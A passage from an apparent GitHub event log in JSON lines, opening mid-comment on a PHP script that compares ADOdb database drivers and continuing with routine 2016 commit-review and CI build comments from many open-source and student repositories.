#error_reporting(E_ALL);\r\ninclude(\"../adodb.inc.php\"); $d=array();\r\nif ($handle = opendir('../drivers')) {\r\n        while (false !== ($driver = readdir($handle))) {\r\n                $driver=substr($driver, 6); # strip 'adodb-'\r\n                if( # only test adodbdrivers that do not simply die() on my environment\r\n                   substr($driver,0,1)=='f'\r\n                || substr($driver,0,3)=='acc'\r\n                || substr($driver,0,1)=='b'\r\n                || substr($driver,0,3)=='csv'\r\n                || substr($driver,0,6)=='db2oci'\r\n                || (substr($driver,0,1)=='i' && !substr($driver,0,10)=='informix72')\r\n                || substr($driver,0,4)=='ldap'\r\n                || substr($driver,0,1)=='o'\r\n                || substr($driver,0,1)=='s'\r\n                || substr($driver,0,1)=='t'\r\n                || substr($driver,0,6)=='sqlite'\r\n                || (substr($driver,0,5)=='mysql' && substr($driver,0,7)!='mysqlpo')\r\n                #|| (substr($driver,0,5)=='mssql' && substr($driver,0,7)!='mssqlpo')\r\n                || substr($driver,0,4)=='pdo.'\r\n                || substr($driver,0,8)=='postgres'\r\n                ){\r\n                        $driver=substr($driver, 0, -8); # strip '.inc.php'\r\n                        #ADOLoadCode($driver);\r\n                        $c = ADONewConnection($driver);\r\n                        $d[]=array(\r\n                                'class'=>get_class($c),\r\n                                'driver'=>$driver,\r\n                                'databaseType'=>$c->databaseType,\r\n                                'dataProvider'=>$c->dataProvider\r\n                        );\r\n                #echo '<pre>';\r\n                #print_r($c);\r\n                #die();\r\n                }\r\n        }\r\n        closedir($handle);\r\n\r\n        function drivercmp($a,$b){\r\n                return strcmp($a['driver'], $b['driver']);\r\n        }\r\n        usort($d, 'drivercmp');\r\n        $css='<style>\r\nh2 {text-align:center;}\r\ntable {border-collapse:collapse;border:1px solid #ddd;margin-left:auto;margin-right:auto;}\r\ntable td, table th {padding:4px;border-bottom:1px solid #ccc;}\r\n</style>\r\n';\r\n        $out.='<table><thead><tr>\r\n<th>PHP class</th>\r\n<th>driver<br> (adodb-*.inc.php)</th>\r\n<th>databaseType</th>\r\n<th>dataProvider</th>\r\n```\r\ngenerated with adodb 5.20.6:\r\n![drivercompare_adodb5 20 6](https://cloud.githubusercontent.com/assets/1839154/18535646/4d108fc8-7af6-11e6-8090-c3bea69e81c0.png)\r\n"}},"created_at":"2016-09-15T01:57:45Z"}
{"id":"4565692528","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19029596,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-15T01:57:59Z","updated_at":"2016-09-15T01:57:59Z","body":"@SubJunk Maybe a stupid question, but do these 2 libraries, `org.apache.commons.lang3.StringUtils.*` and  `org.codehaus.plexus.util.StringUtils`, need to be present together ? One will not be sufficient ?"}},"created_at":"2016-09-15T01:57:59Z"}
{"id":"4565693394","type":"CommitCommentEvent","actor":{"login":"neo00789"},"repo":{"name":"yixia/FFmpeg-Android"},"payload":{"comment":{"id":19029597,"position":null,"line":null,"path":null,"commit_id":"df29cf3c26c39fa751d70e2d6389a5843c116f08","created_at":"2016-09-15T01:58:20Z","updated_at":"2016-09-15T01:58:20Z","body":"建立\r\n\r\n安裝的git的Andr​​oid NDK\r\n$ export ANDROID_NDK=/path/to/your/android-ndk\r\n$ ./FFmpeg-Android.sh\r\nlibffmpeg.so將建成 build/ffmpeg/{neon,armv7,vfp,armv6}/"}},"created_at":"2016-09-15T01:58:20Z"}
{"id":"4565695168","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029604,"position":19,"line":52,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T01:59:04Z","updated_at":"2016-09-15T01:59:04Z","body":"This isn't exactly correct semantics.  In the newer V8, Escape would write a handle to the parent HandleScope but not close the current scope.  In the older V8, Close actually closes the current scope and makes the previous scope the new current one.  That means the user code can only call this method once, and only after it is done using any locals that were allocated on the top handle scope.\r\n\r\nThis is a point where our abstraction appears to not work across different VMs.  Something for us to ponder more about."}},"created_at":"2016-09-15T01:59:04Z"}
{"id":"4565696030","type":"CommitCommentEvent","actor":{"login":"nguillaumin"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19029607,"position":118,"line":669,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-15T01:59:25Z","updated_at":"2016-09-15T01:59:25Z","body":"This is actually already fixed in the latest version of the code, this diff is from an earlier commit. See https://github.com/libretro/RetroArch/pull/3547/files"}},"created_at":"2016-09-15T01:59:25Z"}
{"id":"4567150488","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"matthc31/-defi-recherche-web1-"},"payload":{"comment":{"id":19033267,"position":null,"line":null,"path":null,"commit_id":"5f26085577496219bb9458813bd73c3fed72b313","created_at":"2016-09-15T10:00:12Z","updated_at":"2016-09-15T10:00:12Z","body":"Deux repo sur github ? Pense à faire le ménage"}},"created_at":"2016-09-15T10:00:12Z"}
{"id":"4567151552","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033269,"position":null,"line":null,"path":null,"commit_id":"5ac067250e58d66db49fbee147fa077c0fdcf835","created_at":"2016-09-15T10:00:24Z","updated_at":"2016-09-15T10:00:24Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T10:00:24Z"}
{"id":"4567152918","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"matthc31/-defi-recherche-web1-"},"payload":{"comment":{"id":19033272,"position":null,"line":null,"path":null,"commit_id":"5f26085577496219bb9458813bd73c3fed72b313","created_at":"2016-09-15T10:00:39Z","updated_at":"2016-09-15T10:00:39Z","body":"Copié collé ? As-tu compris?"}},"created_at":"2016-09-15T10:00:39Z"}
{"id":"4567153153","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19033274,"position":null,"line":null,"path":null,"commit_id":"557439aa2884c88b3fa24bed1cb49976250c3751","created_at":"2016-09-15T10:00:43Z","updated_at":"2016-09-15T10:00:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1007](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13312&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 238, ignored: 3 Build time: 00:10:01"}},"created_at":"2016-09-15T10:00:43Z"}
{"id":"4567155538","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033287,"position":4,"line":114,"path":"README.md","commit_id":"8f488ac3159dcdac8e64e3564ae513c5e3bc530a","created_at":"2016-09-15T10:01:14Z","updated_at":"2016-09-15T10:01:14Z","body":"Pourquoi ? try again"}},"created_at":"2016-09-15T10:01:14Z"}
{"id":"4567155839","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033288,"position":null,"line":null,"path":null,"commit_id":"8f488ac3159dcdac8e64e3564ae513c5e3bc530a","created_at":"2016-09-15T10:01:17Z","updated_at":"2016-09-15T10:01:17Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T10:01:17Z"}
{"id":"4567155972","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"matthc31/-defi-recherche-web1-"},"payload":{"comment":{"id":19033289,"position":null,"line":null,"path":null,"commit_id":"dd2ac854e8902de5d419ac755254131dbd540430","created_at":"2016-09-15T10:01:19Z","updated_at":"2016-09-15T10:01:19Z","body":"Et du coup, le web ?"}},"created_at":"2016-09-15T10:01:19Z"}
{"id":"4567156099","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19033290,"position":null,"line":null,"path":null,"commit_id":"b3cdd00f1c9a36eb9b29c4db16361e3f7c01659f","created_at":"2016-09-15T10:01:20Z","updated_at":"2016-09-15T10:01:20Z","body":"Please do not remove classes at LS core code. What about the people having copied a shipped template and having adjusted it?\r\nInstead, please add additional classes and use more specific CSS definitions like .answertext .text-danger if existing styles need to be overwritten."}},"created_at":"2016-09-15T10:01:20Z"}
{"id":"4567157493","type":"CommitCommentEvent","actor":{"login":"myfreeer"},"repo":{"name":"myfreeer/bilibili-helper"},"payload":{"comment":{"id":19033295,"position":null,"line":null,"path":null,"commit_id":"f226d5b4a4eb7b8ba8e585ce69d4f9bbdbc8f7da","created_at":"2016-09-15T10:01:38Z","updated_at":"2016-09-15T10:01:38Z","body":"this service is tested to be somehow unstable, maybe it should be removed in releases."}},"created_at":"2016-09-15T10:01:38Z"}
{"id":"4567157863","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"matthc31/-defi-recherche-web1-"},"payload":{"comment":{"id":19033296,"position":null,"line":null,"path":null,"commit_id":"99d36c53bc9b1f11cf7706e6aeb85e0467778a69","created_at":"2016-09-15T10:01:42Z","updated_at":"2016-09-15T10:01:42Z","body":"copié collé ? Toutes les infos sont-elles vraiment utiles ?"}},"created_at":"2016-09-15T10:01:42Z"}
{"id":"4567159380","type":"CommitCommentEvent","actor":{"login":"mankdev"},"repo":{"name":"devex-web-frontend/dx-components"},"payload":{"comment":{"id":19033300,"position":11,"line":11,"path":"src/components/Loadable/Loadable.jsx","commit_id":"cbe1ddb869b664acadb58b2f86c0c98caef01436","created_at":"2016-09-15T10:02:03Z","updated_at":"2016-09-15T10:02:03Z","body":"let's rename it to LoadingIndicatoComponent"}},"created_at":"2016-09-15T10:02:03Z"}
{"id":"4567160881","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033308,"position":4,"line":150,"path":"README.md","commit_id":"c5b3477117fabc04dd5e70f065077b0209b5144c","created_at":"2016-09-15T10:02:22Z","updated_at":"2016-09-15T10:02:22Z","body":"Plus de source !"}},"created_at":"2016-09-15T10:02:22Z"}
{"id":"4567161153","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033310,"position":null,"line":null,"path":null,"commit_id":"c5b3477117fabc04dd5e70f065077b0209b5144c","created_at":"2016-09-15T10:02:25Z","updated_at":"2016-09-15T10:02:25Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T10:02:25Z"}
{"id":"4567161944","type":"CommitCommentEvent","actor":{"login":"mankdev"},"repo":{"name":"devex-web-frontend/dx-components"},"payload":{"comment":{"id":19033312,"position":31,"line":31,"path":"src/components/Loadable/Loadable.jsx","commit_id":"cbe1ddb869b664acadb58b2f86c0c98caef01436","created_at":"2016-09-15T10:02:35Z","updated_at":"2016-09-15T10:02:35Z","body":"lets use LoadingIndicatorComponent instead of shorthand "}},"created_at":"2016-09-15T10:02:35Z"}
{"id":"4567162378","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19033315,"position":44,"line":44,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/servlet/DemoServlet.java","commit_id":"02e15fff7a385f14102793049c5c472aef73a84e","created_at":"2016-09-15T10:02:41Z","updated_at":"2016-09-15T10:02:41Z","body":"We have commons-io as a project-wide dependency.\r\nHave a look at this method: https://commons.apache.org/proper/commons-io/javadocs/api-2.5/org/apache/commons/io/FileUtils.html#copyFile(java.io.File,%20java.io.OutputStream)"}},"created_at":"2016-09-15T10:02:41Z"}
{"id":"4567162737","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"matthc31/-defi-recherche-web1-"},"payload":{"comment":{"id":19033318,"position":null,"line":null,"path":null,"commit_id":"3b14d5bb5af2438140439ab8d252bc6106932e6f","created_at":"2016-09-15T10:02:45Z","updated_at":"2016-09-15T10:02:45Z","body":"copié collé ?\r\n"}},"created_at":"2016-09-15T10:02:45Z"}
{"id":"4567163078","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033319,"position":4,"line":158,"path":"README.md","commit_id":"5d4c5534dfb9ebd8a595b19b4a4c3944fa471326","created_at":"2016-09-15T10:02:50Z","updated_at":"2016-09-15T10:02:50Z","body":"Try Again !"}},"created_at":"2016-09-15T10:02:50Z"}
{"id":"4567163344","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"matthc31/-defi-recherche-web1-"},"payload":{"comment":{"id":19033320,"position":null,"line":null,"path":null,"commit_id":"3b14d5bb5af2438140439ab8d252bc6106932e6f","created_at":"2016-09-15T10:02:53Z","updated_at":"2016-09-15T10:02:53Z","body":"tu ne dis pas ce que sont les bang ..."}},"created_at":"2016-09-15T10:02:53Z"}
{"id":"4567163646","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033321,"position":null,"line":null,"path":null,"commit_id":"5d4c5534dfb9ebd8a595b19b4a4c3944fa471326","created_at":"2016-09-15T10:02:57Z","updated_at":"2016-09-15T10:02:57Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T10:02:57Z"}
{"id":"4567173460","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19033354,"position":34,"line":34,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/servlet/DemoServlet.java","commit_id":"02e15fff7a385f14102793049c5c472aef73a84e","created_at":"2016-09-15T10:05:10Z","updated_at":"2016-09-15T10:05:10Z","body":"What happens if we can't find the file requested?"}},"created_at":"2016-09-15T10:05:10Z"}
{"id":"4567175151","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19033358,"position":null,"line":null,"path":null,"commit_id":"e7c57e5de4dd9fd9ca7c028d82fc46ad5a834fdb","created_at":"2016-09-15T10:05:30Z","updated_at":"2016-09-15T10:05:30Z","body":"Let's try to put everything in order:\r\n\r\n- An identifier is the name of a variable **or** a type.\r\n- This looks like a hack since there is no way to maintain this, other than rewriting.\r\n- We have similar problem with \"Wring<x>\" which changes to \"x\"\r\n- In short, this needs a quick rewrite. feel free to open an issue (perfection), assign it to me or whoever, and erase these comments from the code.\r\n\r\n"}},"created_at":"2016-09-15T10:05:30Z"}
{"id":"4567176532","type":"CommitCommentEvent","actor":{"login":"sammarshallou"},"repo":{"name":"dj4452/moodle"},"payload":{"comment":{"id":19033362,"position":5,"line":409,"path":"lib/yui/build/moodle-core-dragdrop/moodle-core-dragdrop.js","commit_id":"c85532f9eaf815b989ec5155e99e85ad611b64ad","created_at":"2016-09-15T10:05:49Z","updated_at":"2016-09-15T10:05:49Z","body":"Trivia: JavaScript in Moodle is now supposed to be camelCase, so this variable should be className (I know that isn't consistent with the existing variables, this code is a bit old)."}},"created_at":"2016-09-15T10:05:49Z"}
{"id":"4567177535","type":"CommitCommentEvent","actor":{"login":"sammarshallou"},"repo":{"name":"dj4452/moodle"},"payload":{"comment":{"id":19033363,"position":20,"line":421,"path":"lib/yui/build/moodle-core-dragdrop/moodle-core-dragdrop.js","commit_id":"c85532f9eaf815b989ec5155e99e85ad611b64ad","created_at":"2016-09-15T10:05:52Z","updated_at":"2016-09-15T10:05:52Z","body":"Trivia: Extra space before || sign"}},"created_at":"2016-09-15T10:05:52Z"}
{"id":"4567179038","type":"CommitCommentEvent","actor":{"login":"arvidnilber"},"repo":{"name":"arvidnilber/fillan"},"payload":{"comment":{"id":19033368,"position":null,"line":null,"path":null,"commit_id":"915a4e98b63f333837e120a46f9e886dd125dc64","created_at":"2016-09-15T10:06:11Z","updated_at":"2016-09-15T10:06:11Z","body":"CSS"}},"created_at":"2016-09-15T10:06:11Z"}
{"id":"4567181790","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19033370,"position":null,"line":null,"path":null,"commit_id":"b3cdd00f1c9a36eb9b29c4db16361e3f7c01659f","created_at":"2016-09-15T10:06:44Z","updated_at":"2016-09-15T10:06:44Z","body":"mazi, the Denis work is for the next major release. "}},"created_at":"2016-09-15T10:06:44Z"}
{"id":"4567182070","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19033371,"position":null,"line":null,"path":null,"commit_id":"58ea224b9dda5b351e63267000632d6669f54b2f","created_at":"2016-09-15T10:06:48Z","updated_at":"2016-09-15T10:06:48Z","body":"For me the branch seems OK, I think you can launch a SPRT[-3..1] test. Meanwhile I have put the priority of http://tests.stockfishchess.org/tests/view/57d872800ebc59030fbe52af at -5 (and it was about to fail anyway)."}},"created_at":"2016-09-15T10:06:48Z"}
{"id":"4567182383","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"openMVG/openMVG"},"payload":{"comment":{"id":19033375,"position":25,"line":36,"path":".travis.yml","commit_id":"a761cfec70c907d9d159fe34323ee298f2abd03c","created_at":"2016-09-15T10:06:52Z","updated_at":"2016-09-15T10:06:52Z","body":"I did not try to make coverall to work again recently. I would find time to re-test it.. but time is missing.\r\nCan you be more explicit about the problem you see on your side?\r\nPerhaps it's  just a story of Github authorization for the third_party service."}},"created_at":"2016-09-15T10:06:52Z"}
{"id":"4567188200","type":"CommitCommentEvent","actor":{"login":"adampietrasiak"},"repo":{"name":"adampietrasiak/jquery.initialize"},"payload":{"comment":{"id":19033385,"position":22,"line":17,"path":"jquery.initialize.js","commit_id":"dd0238ccf2060e453a8789fd594e9b35f0f13fff","created_at":"2016-09-15T10:08:12Z","updated_at":"2016-09-15T10:08:12Z","body":"I like it a lot!"}},"created_at":"2016-09-15T10:08:12Z"}
{"id":"4567192128","type":"CommitCommentEvent","actor":{"login":"rhatlapa"},"repo":{"name":"hal/testsuite"},"payload":{"comment":{"id":19033393,"position":13,"line":97,"path":"common/src/main/java/org/jboss/hal/testsuite/util/configurationchanges/ConfigurationChangesResource.java","commit_id":"c31f4c4e1305f2bf2c8dcf01804357706154efd1","created_at":"2016-09-15T10:09:03Z","updated_at":"2016-09-15T10:09:03Z","body":"Why you don't let it just fail with message pointing to HAL-1182 ?"}},"created_at":"2016-09-15T10:09:03Z"}
{"id":"4567192622","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19033394,"position":null,"line":null,"path":null,"commit_id":"afcd2423a9d8bd350a589b35919444ab77615296","created_at":"2016-09-15T10:09:11Z","updated_at":"2016-09-15T10:09:11Z","body":"On a related note (improving boot behaviour): https://github.com/BPI-SINOVOIP/BPI-M2P-bsp/commit/4ed67b2c9ebc81cf1a06bd9ca4e7d27cbec7a721"}},"created_at":"2016-09-15T10:09:11Z"}
{"id":"4567192736","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19033395,"position":null,"line":null,"path":null,"commit_id":"b15856cc9cf160832eb8e4b229a2a877c42b887c","created_at":"2016-09-15T10:09:13Z","updated_at":"2016-09-15T10:09:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1008](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13316&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:54"}},"created_at":"2016-09-15T10:09:13Z"}
{"id":"4567194402","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033401,"position":null,"line":null,"path":null,"commit_id":"9c7f1e515966cbaa4d13cb4780a8c46703f8ada8","created_at":"2016-09-15T10:09:33Z","updated_at":"2016-09-15T10:09:33Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 29](http://munit-050:8112/tc/viewLog.html?buildId=99043&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T10:09:33Z"}
{"id":"4567197738","type":"CommitCommentEvent","actor":{"login":"dbu"},"repo":{"name":"rokka-io/rokka-client-php"},"payload":{"comment":{"id":19033408,"position":null,"line":null,"path":null,"commit_id":"7d49571ed0f0a093373a10b6cea15208cbbc7fb2","created_at":"2016-09-15T10:10:19Z","updated_at":"2016-09-15T10:10:19Z","body":"all that needs would be a tagged release i think. this change is the only one since 0.4 - i'd rather collect more things before doing the next release. if you need the fixed annotations to develop, you can git checkout master && git pull in the vendor directory as a workaround.\r\n\r\n/cc @ChristianRiesen "}},"created_at":"2016-09-15T10:10:19Z"}
{"id":"4567197781","type":"CommitCommentEvent","actor":{"login":"julienlancelot"},"repo":{"name":"SonarSource/sonarqube"},"payload":{"comment":{"id":19033409,"position":31,"line":58,"path":"server/sonar-web/src/main/webapp/WEB-INF/app/models/property.rb","commit_id":"77bd719aedd53e98d72ea00a656773fe7e0a4e48","created_at":"2016-09-15T10:10:20Z","updated_at":"2016-09-15T10:10:20Z","body":"ok, if you have tested it then ok"}},"created_at":"2016-09-15T10:10:20Z"}
{"id":"4567198337","type":"CommitCommentEvent","actor":{"login":"mcccs"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19033411,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-15T10:10:28Z","updated_at":"2016-09-15T10:10:28Z","body":"@ThisTestUser How does the new Gwen work?"}},"created_at":"2016-09-15T10:10:28Z"}
{"id":"4567198406","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19033412,"position":null,"line":null,"path":null,"commit_id":"b3cdd00f1c9a36eb9b29c4db16361e3f7c01659f","created_at":"2016-09-15T10:10:29Z","updated_at":"2016-09-15T10:10:29Z","body":"@maziminke : here the .label .label-danger is really a bug for all templates.\r\n\r\nWith text-danger : we put the color red for all template. And remove the nowrap broken system. \r\n\r\nYou're right on one point : we must add an extra class (just for ls).\r\n\r\nSomething like that maybe:\r\n\r\n````\r\n<tr id=\"javatbd<?php echo $myfname;?>\" class=\"subquestion-list questions-list array<?php echo $zebra; ?><?php if($error){ echo \" has-error\";} ?>\" <?php echo $sDisplayStyle;?> role=\"radiogroup\" aria-labelledby=\"answertext<?php echo $myfname;?>\">\r\n    <th class=\"answertext control-label <?php if($error){ echo \" ls-error ls-error-mandatory\";} ?>\"  id=\"answertext<?php echo $myfname;?>\">\r\n        <?php echo $answertext; ?>\r\n````\r\n\r\nor:\r\n````\r\n<li id=\"javatbd<?php echo $myfname;?>\" class=\"radio-item <?php if($error){ echo \" has-error\";} ?>\" <?php echo $sDisplayStyle;?>>\r\n<label class=\"control-label <?php if($error){ echo \" ls-error ls-error-mandatory\";} ?>\"  \r\n````\r\n\r\nfor list of choices.\r\n"}},"created_at":"2016-09-15T10:10:29Z"}
{"id":"4567204798","type":"CommitCommentEvent","actor":{"login":"gg-soeda"},"repo":{"name":"kikimetal/camp-challenge"},"payload":{"comment":{"id":19033425,"position":9,"line":9,"path":"CampChallenge_PHP/005.PHPでのデータ操作/05_data_manipulation_07_08.php","commit_id":"2e9ebbe6a917e916505b46089619c844d210ed11","created_at":"2016-09-15T10:11:53Z","updated_at":"2016-09-15T10:11:53Z","body":"添田です。\r\nここの[\"$key\"]は[$key]で良いですね。"}},"created_at":"2016-09-15T10:11:53Z"}
{"id":"4567206283","type":"CommitCommentEvent","actor":{"login":"DelazJ"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19033427,"position":6,"line":151,"path":"python/plugins/processing/algs/help/qgis.yaml","commit_id":"4a523511275b48b02592ff4cc64fbf726e4f6547","created_at":"2016-09-15T10:12:14Z","updated_at":"2016-09-15T10:12:14Z","body":"typos with existing (2nd line) and intersection (last line)"}},"created_at":"2016-09-15T10:12:14Z"}
{"id":"4567206709","type":"CommitCommentEvent","actor":{"login":"DelazJ"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19033428,"position":null,"line":null,"path":null,"commit_id":"4a523511275b48b02592ff4cc64fbf726e4f6547","created_at":"2016-09-15T10:12:19Z","updated_at":"2016-09-15T10:12:19Z","body":"Would this be backported to master_2 and 2.16?"}},"created_at":"2016-09-15T10:12:19Z"}
{"id":"4567208612","type":"CommitCommentEvent","actor":{"login":"phaazon"},"repo":{"name":"llogiq/ion"},"payload":{"comment":{"id":19033432,"position":null,"line":null,"path":null,"commit_id":"854a8f9f4d2ae9f84be9002519848af25b1e08cb","created_at":"2016-09-15T10:12:45Z","updated_at":"2016-09-15T10:12:45Z","body":"A lot of those warnings are not a matter to me. Worse, some of them are really bad – like putting `[cfg(feature…)]` everywhere. Though, I didn’t know about `.cloned()`, I’ll add that. :) Have you tried to use luminance or ion yet? I saw you forking both the repos!"}},"created_at":"2016-09-15T10:12:45Z"}
{"id":"4567208613","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19033433,"position":5,"line":23,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-15T10:12:45Z","updated_at":"2016-09-15T10:12:45Z","body":"callbackをこのように書くのは、何かの言語の影響なのでしょうか？"}},"created_at":"2016-09-15T10:12:45Z"}
{"id":"4567209517","type":"CommitCommentEvent","actor":{"login":"olc-olivier"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19033436,"position":66,"line":159,"path":"config/webpack.common.js","commit_id":"dd1276b4989319a66e189ee78b87dc86a3a451a1","created_at":"2016-09-15T10:12:57Z","updated_at":"2016-09-15T10:12:57Z","body":"It's working fine for me. I think your problem is not from this change."}},"created_at":"2016-09-15T10:12:57Z"}
{"id":"4567210901","type":"CommitCommentEvent","actor":{"login":"fengjinlong"},"repo":{"name":"fengjinlong/start"},"payload":{"comment":{"id":19033439,"position":null,"line":null,"path":null,"commit_id":"d2ad902fe542cb332de54066398ba1e7fe6a89bf","created_at":"2016-09-15T10:13:17Z","updated_at":"2016-09-15T10:13:17Z","body":"八月十五\n"}},"created_at":"2016-09-15T10:13:17Z"}
{"id":"4567211521","type":"CommitCommentEvent","actor":{"login":"Andycar"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19033440,"position":null,"line":null,"path":null,"commit_id":"5989da3d46dab497a2ec03ef6c9c42dc25f0b612","created_at":"2016-09-15T10:13:25Z","updated_at":"2016-09-15T10:13:25Z","body":"Oh, I see... OK! Right now looking at some real-time values in  /sys/class/power_supply/battery/current_now at 100% and right after that. "}},"created_at":"2016-09-15T10:13:25Z"}
{"id":"4567213174","type":"CommitCommentEvent","actor":{"login":"castolpe"},"repo":{"name":"ddionrails/visualization"},"payload":{"comment":{"id":19033443,"position":null,"line":null,"path":null,"commit_id":"1353a42f0d6fca6e31eec73df2b69a6242ace78e","created_at":"2016-09-15T10:13:47Z","updated_at":"2016-09-15T10:13:47Z","body":"fixes #14 "}},"created_at":"2016-09-15T10:13:47Z"}
{"id":"4567213750","type":"CommitCommentEvent","actor":{"login":"not-a-user"},"repo":{"name":"AmatCoder/mednaffe"},"payload":{"comment":{"id":19033447,"position":null,"line":null,"path":null,"commit_id":"82e14dcf392dd0b876343cd8b58caa25029a76f4","created_at":"2016-09-15T10:13:55Z","updated_at":"2016-09-15T10:13:55Z","body":"1. This bumps the Mednafen requirement to 0.9.39 without changing documentation and without changing error messages.\r\n2. This breaks compatibility with Ubuntu 16.04 which has Mednafen 0.9.38.7 in stock."}},"created_at":"2016-09-15T10:13:55Z"}
{"id":"4567216080","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19033452,"position":null,"line":null,"path":null,"commit_id":"d38fa702f071be079b319a32f4544afe1e101981","created_at":"2016-09-15T10:14:27Z","updated_at":"2016-09-15T10:14:27Z","body":":+1: Grazie!"}},"created_at":"2016-09-15T10:14:27Z"}
{"id":"4567217123","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19033453,"position":24,"line":24,"path":"src/pocketmine/block/Attachable.php","commit_id":"aa696c57fbf501de4f92a010bcb929254e7c595f","created_at":"2016-09-15T10:14:41Z","updated_at":"2016-09-15T10:14:41Z","body":"I think it is."}},"created_at":"2016-09-15T10:14:41Z"}
{"id":"4567217125","type":"CommitCommentEvent","actor":{"login":"Maartenwut"},"repo":{"name":"Maartenwut/DeCirkeltrekBot"},"payload":{"comment":{"id":19033454,"position":null,"line":null,"path":null,"commit_id":"5093010da10d7580344e6295f0375474daebac6d","created_at":"2016-09-15T10:14:41Z","updated_at":"2016-09-15T10:14:41Z","body":"Wauw dit kan beter.."}},"created_at":"2016-09-15T10:14:41Z"}
